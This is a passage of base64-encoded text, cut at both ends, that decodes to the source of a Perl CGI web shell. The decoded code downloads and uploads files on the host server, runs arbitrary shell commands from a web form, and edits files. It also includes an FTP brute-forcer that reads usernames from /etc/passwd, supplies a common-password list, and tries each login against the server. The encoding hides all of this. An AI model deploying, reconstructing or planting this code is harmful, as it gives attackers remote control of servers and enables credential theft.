tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiBkaXNwbGF5cyB0aGUgcGFnZSB0aGF0IGNvbnRhaW5zIGEgbGluayB3aGljaCBhbGxvd3MgdGhlIHVzZXIKIyB0byBkb3dubG9hZCB0aGUgc3BlY2lmaWVkIGZpbGUuIFRoZSBwYWdlIGFsc28gY29udGFpbnMgYSBhdXRvLXJlZnJlc2gKIyBmZWF0dXJlIHRoYXQgc3RhcnRzIHRoZSBkb3dubG9hZCBhdXRvbWF0aWNhbGx5LgojIEFyZ3VtZW50IDE6IEZ1bGx5IHF1YWxpZmllZCBmaWxlbmFtZSBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50RG93bmxvYWRMaW5rUGFnZQp7Cglsb2NhbCgkRmlsZVVybCkgPSBAXzsKCW15ICRyZXN1bHQ9IiI7CglpZigtZSAkRmlsZVVybCkgIyBpZiB0aGUgZmlsZSBleGlzdHMKCXsKCQkjIGVuY29kZSB0aGUgZmlsZSBsaW5rIHNvIHdlIGNhbiBzZW5kIGl0IHRvIHRoZSBicm93c2VyCgkJJEZpbGVVcmwgPX4gcy8oW15hLXpBLVowLTldKS8nJScudW5wYWNrKCJIKiIsJDEpL2VnOwoJCSREb3dubG9hZExpbmsgPSAiJFNjcmlwdExvY2F0aW9uP2E9ZG93bmxvYWQmZj0kRmlsZVVybCZvPWdvIjsKCQkkSHRtbE1ldGFIZWFkZXIgPSAiPG1ldGEgSFRUUC1FUVVJVj1cIlJlZnJlc2hcIiBDT05URU5UPVwiMTsgVVJMPSREb3dubG9hZExpbmtcIj4iOwoJCSZQcmludFBhZ2VIZWFkZXIoImMiKTsKCQkkcmVzdWx0IC49IDw8RU5EOwpTZW5kaW5nIEZpbGUgJFRyYW5zZmVyRmlsZS4uLjxicj4KCklmIHRoZSBkb3dubG9hZCBkb2VzIG5vdCBzdGFydCBhdXRvbWF0aWNhbGx5LAo8YSBocmVmPSIkRG93bmxvYWRMaW5rIj5DbGljayBIZXJlPC9hPgpFTkQKCQkkcmVzdWx0IC49ICZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOwoJfQoJZWxzZSAjIGZpbGUgZG9lc24ndCBleGlzdAoJewoJCSRyZXN1bHQgLj0gIkZhaWxlZCB0byBkb3dubG9hZCAkRmlsZVVybDogJCEiOwoJCSRyZXN1bHQgLj0gJlByaW50RmlsZURvd25sb2FkRm9ybTsKCX0KCXJldHVybiAkcmVzdWx0Owp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiByZWFkcyB0aGUgc3BlY2lmaWVkIGZpbGUgZnJvbSB0aGUgZGlzayBhbmQgc2VuZHMgaXQgdG8gdGhlCiMgYnJvd3Nlciwgc28gdGhhdCBpdCBjYW4gYmUgZG93bmxvYWRlZCBieSB0aGUgdXNlci4KIyBBcmd1bWVudCAxOiBGdWxseSBxdWFsaWZpZWQgcGF0aG5hbWUgb2YgdGhlIGZpbGUgdG8gYmUgc2VudC4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgU2VuZEZpbGVUb0Jyb3dzZXIKewoJbXkgJHJlc3VsdCA9ICIiOwoJbG9jYWwoJFNlbmRGaWxlKSA9IEBfOwoJaWYob3BlbihTRU5ERklMRSwgJFNlbmRGaWxlKSkgIyBmaWxlIG9wZW5lZCBmb3IgcmVhZGluZwoJewoJCWlmKCRXaW5OVCkKCQl7CgkJCWJpbm1vZGUoU0VOREZJTEUpOwoJCQliaW5tb2RlKFNURE9VVCk7CgkJfQoJCSRGaWxlU2l6ZSA9IChzdGF0KCRTZW5kRmlsZSkpWzddOwoJCSgkRmlsZW5hbWUgPSAkU2VuZEZpbGUpID1+ICBtIShbXi9eXFxdKikkITsKCQlwcmludCAiQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXVua25vd25cbiI7CgkJcHJpbnQgIkNvbnRlbnQtTGVuZ3RoOiAkRmlsZVNpemVcbiI7CgkJcHJpbnQgIkNvbnRlbnQtRGlzcG9zaXRpb246IGF0dGFjaG1lbnQ7IGZpbGVuYW1lPSQxXG5cbiI7CgkJcHJpbnQgd2hpbGUoPFNFTkRGSUxFPik7CgkJY2xvc2UoU0VOREZJTEUpOwoJCWV4aXQoMSk7Cgl9CgllbHNlICMgZmFpbGVkIHRvIG9wZW4gZmlsZQoJewoJCSRyZXN1bHQgLj0gIkZhaWxlZCB0byBkb3dubG9hZCAkU2VuZEZpbGU6ICQhIjsKCQkkcmVzdWx0IC49JlByaW50RmlsZURvd25sb2FkRm9ybTsKCX0KCXJldHVybiAkcmVzdWx0Owp9CgoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHdoZW4gdGhlIHVzZXIgZG93bmxvYWRzIGEgZmlsZS4gSXQgZGlzcGxheXMgYSBtZXNzYWdlCiMgdG8gdGhlIHVzZXIgYW5kIHByb3ZpZGVzIGEgbGluayB0aHJvdWdoIHdoaWNoIHRoZSBmaWxlIGNhbiBiZSBkb3dubG9hZGVkLgojIFRoaXMgZnVuY3Rpb24gaXMgYWxzbyBjYWxsZWQgd2hlbiB0aGUgdXNlciBjbGlja3Mgb24gdGhhdCBsaW5rLiBJbiB0aGlzIGNhc2UsCiMgdGhlIGZpbGUgaXMgcmVhZCBhbmQgc2VudCB0byB0aGUgYnJvd3Nlci4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgQmVnaW5Eb3dubG9hZAp7CgkjIGdldCBmdWxseSBxdWFsaWZpZWQgcGF0aCBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkCglpZigoJFdpbk5UICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9eXFx8Xi46LykpIHwKCQkoISRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlwvLykpKSAjIHBhdGggaXMgYWJzb2x1dGUKCXsKCQkkVGFyZ2V0RmlsZSA9ICRUcmFuc2ZlckZpbGU7Cgl9CgllbHNlICMgcGF0aCBpcyByZWxhdGl2ZQoJewoJCWNob3AoJFRhcmdldEZpbGUpIGlmKCRUYXJnZXRGaWxlID0gJEN1cnJlbnREaXIpID1+IG0vW1xcXC9dJC87CgkJJFRhcmdldEZpbGUgLj0gJFBhdGhTZXAuJFRyYW5zZmVyRmlsZTsKCX0KCglpZigkT3B0aW9ucyBlcSAiZ28iKSAjIHdlIGhhdmUgdG8gc2VuZCB0aGUgZmlsZQoJewoJCSZTZW5kRmlsZVRvQnJvd3NlcigkVGFyZ2V0RmlsZSk7Cgl9CgllbHNlICMgd2UgaGF2ZSB0byBzZW5kIG9ubHkgdGhlIGxpbmsgcGFnZQoJewoJCSZQcmludERvd25sb2FkTGlua1BhZ2UoJFRhcmdldEZpbGUpOwoJfQp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdXNlciB3YW50cyB0byB1cGxvYWQgYSBmaWxlLiBJZiB0aGUKIyBmaWxlIGlzIG5vdCBzcGVjaWZpZWQsIGl0IGRpc3BsYXlzIGEgZm9ybSBhbGxvd2luZyB0aGUgdXNlciB0byBzcGVjaWZ5IGEKIyBmaWxlLCBvdGhlcndpc2UgaXQgc3RhcnRzIHRoZSB1cGxvYWQgcHJvY2Vzcy4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgVXBsb2FkRmlsZQp7CgkjIGlmIG5vIGZpbGUgaXMgc3BlY2lmaWVkLCBwcmludCB0aGUgdXBsb2FkIGZvcm0gYWdhaW4KCWlmKCRUcmFuc2ZlckZpbGUgZXEgIiIpCgl7CgkJcmV0dXJuICZQcmludEZpbGVVcGxvYWRGb3JtOwoKCX0KCW15ICRyZXN1bHQ9IiI7CgkjIHN0YXJ0IHRoZSB1cGxvYWRpbmcgcHJvY2VzcwoJJHJlc3VsdCAuPSAiVXBsb2FkaW5nICRUcmFuc2ZlckZpbGUgdG8gJEN1cnJlbnREaXIuLi48YnI+IjsKCgkjIGdldCB0aGUgZnVsbGx5IHF1YWxpZmllZCBwYXRobmFtZSBvZiB0aGUgZmlsZSB0byBiZSBjcmVhdGVkCgljaG9wKCRUYXJnZXROYW1lKSBpZiAoJFRhcmdldE5hbWUgPSAkQ3VycmVudERpcikgPX4gbS9bXFxcL10kLzsKCSRUcmFuc2ZlckZpbGUgPX4gbSEoW14vXlxcXSopJCE7CgkkVGFyZ2V0TmFtZSAuPSAkUGF0aFNlcC4kMTsKCgkkVGFyZ2V0RmlsZVNpemUgPSBsZW5ndGgoJGlueydmaWxlZGF0YSd9KTsKCSMgaWYgdGhlIGZpbGUgZXhpc3RzIGFuZCB3ZSBhcmUgbm90IHN1cHBvc2VkIHRvIG92ZXJ3cml0ZSBpdAoJaWYoLWUgJFRhcmdldE5hbWUgJiYgJE9wdGlvbnMgbmUgIm92ZXJ3cml0ZSIpCgl7CgkJJHJlc3VsdCAuPSAiRmFpbGVkOiBEZXN0aW5hdGlvbiBmaWxlIGFscmVhZHkgZXhpc3RzLjxicj4iOwoJfQoJZWxzZSAjIGZpbGUgaXMgbm90IHByZXNlbnQKCXsKCQlpZihvcGVuKFVQTE9BREZJTEUsICI+JFRhcmdldE5hbWUiKSkKCQl7CgkJCWJpbm1vZGUoVVBMT0FERklMRSkgaWYgJFdpbk5UOwoJCQlwcmludCBVUExPQURGSUxFICRpbnsnZmlsZWRhdGEnfTsKCQkJY2xvc2UoVVBMT0FERklMRSk7CgkJCSRyZXN1bHQgLj0gIlRyYW5zZmVyZWQgJFRhcmdldEZpbGVTaXplIEJ5dGVzLjxicj4iOwoJCQkkcmVzdWx0IC49ICJGaWxlIFBhdGg6ICRUYXJnZXROYW1lPGJyPiI7CgkJfQoJCWVsc2UKCQl7CgkJCSRyZXN1bHQgLj0gIkZhaWxlZDogJCE8YnI+IjsKCQl9Cgl9CgkkcmVzdWx0IC49ICZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOwoJcmV0dXJuICRyZXN1bHQ7Cn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB3aGVuIHRoZSB1c2VyIHdhbnRzIHRvIGRvd25sb2FkIGEgZmlsZS4gSWYgdGhlCiMgZmlsZW5hbWUgaXMgbm90IHNwZWNpZmllZCwgaXQgZGlzcGxheXMgYSBmb3JtIGFsbG93aW5nIHRoZSB1c2VyIHRvIHNwZWNpZnkgYQojIGZpbGUsIG90aGVyd2lzZSBpdCBkaXNwbGF5cyBhIG1lc3NhZ2UgdG8gdGhlIHVzZXIgYW5kIHByb3ZpZGVzIGEgbGluawojIHRocm91Z2ggIHdoaWNoIHRoZSBmaWxlIGNhbiBiZSBkb3dubG9hZGVkLgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBEb3dubG9hZEZpbGUKewoJIyBpZiBubyBmaWxlIGlzIHNwZWNpZmllZCwgcHJpbnQgdGhlIGRvd25sb2FkIGZvcm0gYWdhaW4KCWlmKCRUcmFuc2ZlckZpbGUgZXEgIiIpCgl7CgkJJlByaW50UGFnZUhlYWRlcigiZiIpOwoJCXJldHVybiAmUHJpbnRGaWxlRG93bmxvYWRGb3JtOwoJfQoJCgkjIGdldCBmdWxseSBxdWFsaWZpZWQgcGF0aCBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkCglpZigoJFdpbk5UICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9eXFx8Xi46LykpIHwgKCEkV2luTlQgJiAoJFRyYW5zZmVyRmlsZSA9fiBtL15cLy8pKSkgIyBwYXRoIGlzIGFic29sdXRlCgl7CgkJJFRhcmdldEZpbGUgPSAkVHJhbnNmZXJGaWxlOwoJfQoJZWxzZSAjIHBhdGggaXMgcmVsYXRpdmUKCXsKCQljaG9wKCRUYXJnZXRGaWxlKSBpZigkVGFyZ2V0RmlsZSA9ICRDdXJyZW50RGlyKSA9fiBtL1tcXFwvXSQvOwoJCSRUYXJnZXRGaWxlIC49ICRQYXRoU2VwLiRUcmFuc2ZlckZpbGU7Cgl9CgoJaWYoJE9wdGlvbnMgZXEgImdvIikgIyB3ZSBoYXZlIHRvIHNlbmQgdGhlIGZpbGUKCXsKCQlyZXR1cm4gJlNlbmRGaWxlVG9Ccm93c2VyKCRUYXJnZXRGaWxlKTsKCX0KCWVsc2UgIyB3ZSBoYXZlIHRvIHNlbmQgb25seSB0aGUgbGluayBwYWdlCgl7CgkJcmV0dXJuICZQcmludERvd25sb2FkTGlua1BhZ2UoJFRhcmdldEZpbGUpOwoJfQp9CgoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHRvIGV4ZWN1dGUgY29tbWFuZHMuIEl0IGRpc3BsYXlzIHRoZSBvdXRwdXQgb2YgdGhlCiMgY29tbWFuZCBhbmQgYWxsb3dzIHRoZSB1c2VyIHRvIGVudGVyIGFub3RoZXIgY29tbWFuZC4gVGhlIGNoYW5nZSBkaXJlY3RvcnkKIyBjb21tYW5kIGlzIGhhbmRsZWQgZGlmZmVyZW50bHkuIEluIHRoaXMgY2FzZSwgdGhlIG5ldyBkaXJlY3RvcnkgaXMgc3RvcmVkIGluCiMgYW4gaW50ZXJuYWwgdmFyaWFibGUgYW5kIGlzIHVzZWQgZWFjaCB0aW1lIGEgY29tbWFuZCBoYXMgdG8gYmUgZXhlY3V0ZWQuIFRoZQojIG91dHB1dCBvZiB0aGUgY2hhbmdlIGRpcmVjdG9yeSBjb21tYW5kIGlzIG5vdCBkaXNwbGF5ZWQgdG8gdGhlIHVzZXJzCiMgdGhlcmVmb3JlIGVycm9yIG1lc3NhZ2VzIGNhbm5vdCBiZSBkaXNwbGF5ZWQuCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIEV4ZWN1dGVDb21tYW5kCnsKCW15ICRyZXN1bHQ9IiI7CglpZigkUnVuQ29tbWFuZCA9fiBtL15ccypjZFxzKyguKykvKSAjIGl0IGlzIGEgY2hhbmdlIGRpciBjb21tYW5kCgl7CgkJIyB3ZSBjaGFuZ2UgdGhlIGRpcmVjdG9yeSBpbnRlcm5hbGx5LiBUaGUgb3V0cHV0IG9mIHRoZQoJCSMgY29tbWFuZCBpcyBub3QgZGlzcGxheWVkLgoJCSRDb21tYW5kID0gImNkIFwiJEN1cnJlbnREaXJcIiIuJENtZFNlcC4iY2QgJDEiLiRDbWRTZXAuJENtZFB3ZDsKCQljaG9wKCRDdXJyZW50RGlyID0gYCRDb21tYW5kYCk7CgkJJHJlc3VsdCAuPSAmUHJpbnRDb21tYW5kTGluZUlucHV0Rm9ybTsKCgkJJHJlc3VsdCAuPSAiQ29tbWFuZDogPHJ1bj4kUnVuQ29tbWFuZCA8L3J1bj48YnI+PHRleHRhcmVhIGNvbHM9JyRjb2xzJyByb3dzPSckcm93cycgc3BlbGxjaGVjaz0nZmFsc2UnPiI7CgkJIyB4dWF0IHRob25nIHRpbiBraGkgY2h1eWVuIGRlbiAxIHRodSBtdWMgbmFvIGRvIQoJCSRSdW5Db21tYW5kPSAkV2luTlQ/ImRpciI6ImRpciAtbGlhIjsKCQkkcmVzdWx0IC49ICZSdW5DbWQ7Cgl9ZWxzaWYoJFJ1bkNvbW1hbmQgPX4gbS9eXHMqZWRpdFxzKyguKykvKQoJewoJCSRyZXN1bHQgLj0gICZTYXZlRmlsZUZvcm07Cgl9ZWxzZQoJewoJCSRyZXN1bHQgLj0gJlByaW50Q29tbWFuZExpbmVJbnB1dEZvcm07CgkJJHJlc3VsdCAuPSAiQ29tbWFuZDogPHJ1bj4kUnVuQ29tbWFuZDwvcnVuPjxicj48dGV4dGFyZWEgaWQ9J2RhdGEnIGNvbHM9JyRjb2xzJyByb3dzPSckcm93cycgc3BlbGxjaGVjaz0nZmFsc2UnPiI7CgkJJHJlc3VsdCAuPSZSdW5DbWQ7Cgl9CgkkcmVzdWx0IC49ICAiPC90ZXh0YXJlYT4iOwoJcmV0dXJuICRyZXN1bHQ7Cn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBydW4gY29tbWFuZAojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCgpzdWIgUnVuQ21kCnsKCW15ICRyZXN1bHQ9IiI7CgkkQ29tbWFuZCA9ICJjZCBcIiRDdXJyZW50RGlyXCIiLiRDbWRTZXAuJFJ1bkNvbW1hbmQuJFJlZGlyZWN0b3I7CglpZighJFdpbk5UKQoJewoJCSRTSUd7J0FMUk0nfSA9IFwmQ29tbWFuZFRpbWVvdXQ7CgkJYWxhcm0oJENvbW1hbmRUaW1lb3V0RHVyYXRpb24pOwoJfQoJaWYoJFNob3dEeW5hbWljT3V0cHV0KSAjIHNob3cgb3V0cHV0IGFzIGl0IGlzIGdlbmVyYXRlZAoJewoJCSR8PTE7CgkJJENvbW1hbmQgLj0gIiB8IjsKCQlvcGVuKENvbW1hbmRPdXRwdXQsICRDb21tYW5kKTsKCQl3aGlsZSg8Q29tbWFuZE91dHB1dD4pCgkJewoJCQkkXyA9fiBzLyhcbnxcclxuKSQvLzsKCQkJJHJlc3VsdCAuPSAmSHRtbFNwZWNpYWxDaGFycygiJF9cbiIpOwoJCX0KCQkkfD0wOwoJfQoJZWxzZSAjIHNob3cgb3V0cHV0IGFmdGVyIGNvbW1hbmQgY29tcGxldGVzCgl7CgkJJHJlc3VsdCAuPSAmSHRtbFNwZWNpYWxDaGFycygnJENvbW1hbmQnKTsKCX0KCWlmKCEkV2luTlQpCgl7CgkJYWxhcm0oMCk7Cgl9CglyZXR1cm4gJHJlc3VsdDsKfQojPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09CiMgRm9ybSBTYXZlIEZpbGUgCiM9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0Kc3ViIFNhdmVGaWxlRm9ybQp7CglteSAkcmVzdWx0ID0iIjsKCXN1YnN0cigkUnVuQ29tbWFuZCwwLDUpPSIiOwoJbXkgJGZpbGU9JnRyaW0oJFJ1bkNvbW1hbmQpOwoJJHNhdmU9Jzxicj48aW5wdXQgbmFtZT0iYSIgdHlwZT0ic3VibWl0IiB2YWx1ZT0ic2F2ZSIgY2xhc3M9InN1Ym1pdCIgPic7CgkkRmlsZT0kQ3VycmVudERpci4kUGF0aFNlcC4kUnVuQ29tbWFuZDsKCW15ICRkaXI9IjxzcGFuIHN0eWxlPSdmb250OiAxMXB0IFZlcmRhbmE7IGZvbnQtd2VpZ2h0OiBib2xkOyc+Ii4mQWRkTGlua0RpcigiZ3VpIikuIjwvc3Bhbj4iOwoJaWYoLXcgJEZpbGUpCgl7CgkJJHJvd3M9IjIzIgoJfWVsc2UKCXsKCQkkbXNnPSI8YnI+PGZvbnQgc3R5bGU9J2ZvbnQ6IDE1cHQgVmVyZGFuYTsgY29sb3I6IHllbGxvdzsnID4gUGVybWlzc2lvbiBkZW5pZWQhPGZvbnQ+PGJyPiI7CgkJJHJvd3M9IjIwIgoJfQoJJFByb21wdCA9ICRXaW5OVCA/ICIkZGlyID4gIiA6ICI8Zm9udCBjb2xvcj0nI0ZGRkZGRic+W2FkbWluXEAkU2VydmVyTmFtZSAkZGlyXVwkPC9mb250PiAiOwoJJHJlYWQ9KCRXaW5OVCk/InR5cGUiOiJsZXNzIjsKCSRSdW5Db21tYW5kID0gIiRyZWFkIFwiJFJ1bkNvbW1hbmRcIiI7CgkkcmVzdWx0IC49ICA8PEVORDsKCTxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPgoKCTxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImQiIHZhbHVlPSIkQ3VycmVudERpciI+CgkkUHJvbXB0Cgk8aW5wdXQgdHlwZT0idGV4dCIgc2l6ZT0iNDAiIG5hbWU9ImMiPgoJPGlucHV0IG5hbWU9InMiIGNsYXNzPSJzdWJtaXQiIHR5cGU9InN1Ym1pdCIgdmFsdWU9IkVudGVyIj4KCTxicj5Db21tYW5kOiA8cnVuPiAkUnVuQ29tbWFuZCA8L3J1bj4KCTxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImZpbGUiIHZhbHVlPSIkZmlsZSIgPiAkc2F2ZSA8YnI+ICRtc2cKCTxicj48dGV4dGFyZWEgaWQ9ImRhdGEiIG5hbWU9ImRhdGEiIGNvbHM9IiRjb2xzIiByb3dzPSIkcm93cyIgc3BlbGxjaGVjaz0iZmFsc2UiPgpFTkQKCQoJJHJlc3VsdCAuPSAmUnVuQ21kOwoJJHJlc3VsdCAuPSAgIjwvdGV4dGFyZWE+IjsKCSRyZXN1bHQgLj0gICI8L2Zvcm0+IjsKCXJldHVybiAkcmVzdWx0Owp9CiM9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0KIyBTYXZlIEZpbGUKIz09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PQpzdWIgU2F2ZUZpbGUoJCkKewoJbXkgJERhdGE9IHNoaWZ0IDsKCW15ICRGaWxlPSBzaGlmdDsKCSRGaWxlPSRDdXJyZW50RGlyLiRQYXRoU2VwLiRGaWxlOwoJaWYob3BlbihGSUxFLCAiPiRGaWxlIikpCgl7CgkJYmlubW9kZSBGSUxFOwoJCXByaW50IEZJTEUgJERhdGE7CgkJY2xvc2UgRklMRTsKCQlyZXR1cm4gMTsKCX1lbHNlCgl7CgkJcmV0dXJuIDA7Cgl9Cn0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIEJydXRlIEZvcmNlciBGb3JtCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIEJydXRlRm9yY2VyRm9ybQp7CglteSAkcmVzdWx0PSIiOwoJJHJlc3VsdCAuPSA8PEVORDsKCjx0YWJsZT4KCjx0cj4KPHRkIGNvbHNwYW49IjIiIGFsaWduPSJjZW50ZXIiPgojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyM8YnI+ClNpbXBsZSBGVFAgYnJ1dGUgZm9yY2VyPGJyPgojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+Cgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iYnJ1dGVmb3JjZXIiLz4KPC90ZD4KPC90cj4KPHRyPgo8dGQ+VXNlcjo8YnI+PHRleHRhcmVhIHJvd3M9IjE4IiBjb2xzPSIzMCIgbmFtZT0idXNlciI+CkVORApjaG9wKCRyZXN1bHQgLj0gYGxlc3MgL2V0Yy9wYXNzd2QgfCBjdXQgLWQ6IC1mMWApOwokcmVzdWx0IC49IDw8J0VORCc7CjwvdGV4dGFyZWE+PC90ZD4KPHRkPgoKUGFzczo8YnI+Cjx0ZXh0YXJlYSByb3dzPSIxOCIgY29scz0iMzAiIG5hbWU9InBhc3MiPjEyM3Bhc3MKMTIzIUAjCjEyM2FkbWluCjEyM2FiYwoxMjM0NTZhZG1pbgoxMjM0NTU0MzIxCjEyMzQ0MzIxCnBhc3MxMjMKYWRtaW4KYWRtaW5jcAphZG1pbmlzdHJhdG9yCm1hdGtoYXUKcGFzc2FkbWluCnBAc3N3b3JkCnBAc3N3MHJkCnBhc3N3b3JkCjEyMzQ1NgoxMjM0NTY3CjEyMzQ1Njc4CjEyMzQ1Njc4OQoxMjM0NTY3ODkwCjExMTExMQowMDAwMDAKMjIyMjIyCjMzMzMzMwo0NDQ0NDQKNTU1NTU1CjY2NjY2Ngo3Nzc3NzcKODg4ODg4Cjk5OTk5OQoxMjMxMjMKMjM0MjM0CjM0NTM0NQo0NTY0NTYKNTY3NTY3CjY3ODY3OAo3ODk3ODkKMTIzMzIxCjQ1NjY1NAo2NTQzMjEKNzY1NDMyMQo4NzY1NDMyMQo5ODc2NTQzMjEKMDk4NzY1NDMyMQphZG1pbjEyMwphZG1pbjEyMzQ1NgphYmNkZWYKYWJjYWJjCiFAIyFAIwohQCMkJV4KIUAjJCVeJiooCiFAIyQkI0AhCmFiYzEyMwphbmh5ZXVlbQppbG92ZXlvdTwvdGV4dGFyZWE+CjwvdGQ+CjwvdHI+Cjx0cj4KPHRkIGNvbHNwYW49IjIiIGFsaWduPSJjZW50ZXIiPgpTbGVlcDo8c2VsZWN0IG5hbWU9InNsZWVwIj4KCjxvcHRpb24+MDwvb3B0aW9uPgo8b3B0aW9uPjE8L29wdGlvbj4KPG9wdGlvbj4yPC9vcHRpb24+Cgo8b3B0aW9uPjM8L29wdGlvbj4KPC9zZWxlY3Q+IAo8aW5wdXQgdHlwZT0ic3VibWl0IiBjbGFzcz0ic3VibWl0IiB2YWx1ZT0iQnJ1dGUgRm9yY2VyIi8+PC90ZD48L3RyPgo8L2Zvcm0+CjwvdGFibGU+CkVORApyZXR1cm4gJHJlc3VsdDsKfQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgQnJ1dGUgRm9yY2VyCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIEJydXRlRm9yY2VyCnsKCW15ICRyZXN1bHQ9IiI7CgkkU2VydmVyPSRFTlZ7J1NFUlZFUl9BRERSJ307CglpZigkaW57J3VzZXInfSBlcSAiIikKCXsKCQkkcmVzdWx0IC49ICZCcnV0ZUZvcmNlckZvcm07Cgl9ZWxzZQoJewoJCXVzZSBOZXQ6OkZUUDsgCgkJQHVzZXI9IHNwbGl0KC9cbi8sICRpbnsndXNlcid9KTsKCQlAcGFzcz0gc3BsaXQoL1xuLywgJGlueydwYXNzJ30pOwoJCWNob21wKEB1c2VyKTsKCQljaG9tcChAcGFzcyk7CgkJJHJlc3VsdCAuPSAiPGJyPjxicj5bK10gVHJ5aW5nIGJydXRlICRTZXJ2ZXJOYW1lPGJyPj09PT09PT09PT09PT09PT09PT09Pj4+Pj4+Pj4+Pj4+PDw8PDw8PDw8PD09PT09PT09PT09PT09PT09PT09PGJyPjxicj5cbiI7CgkJZm9yZWFjaCAkdXNlcm5hbWUgKEB1c2VyKQoJCXsKCQkJaWYoISgkdXNlcm5hbWUgZXEgIiIpKQoJCQl7CgkJCQlmb3JlYWNoICRwYXNzd29yZCAoQHBhc3MpCgkJCQl7CgkJCQkJJGZ0cCA9IE5ldDo6RlRQLT5uZXcoJFNlcnZlcikgb3IgZGllICJDb3VsZCBub3QgY29ubmVjdCB0byAkU2VydmVyTmFtZVxuIjsgCgkJCQkJaWYo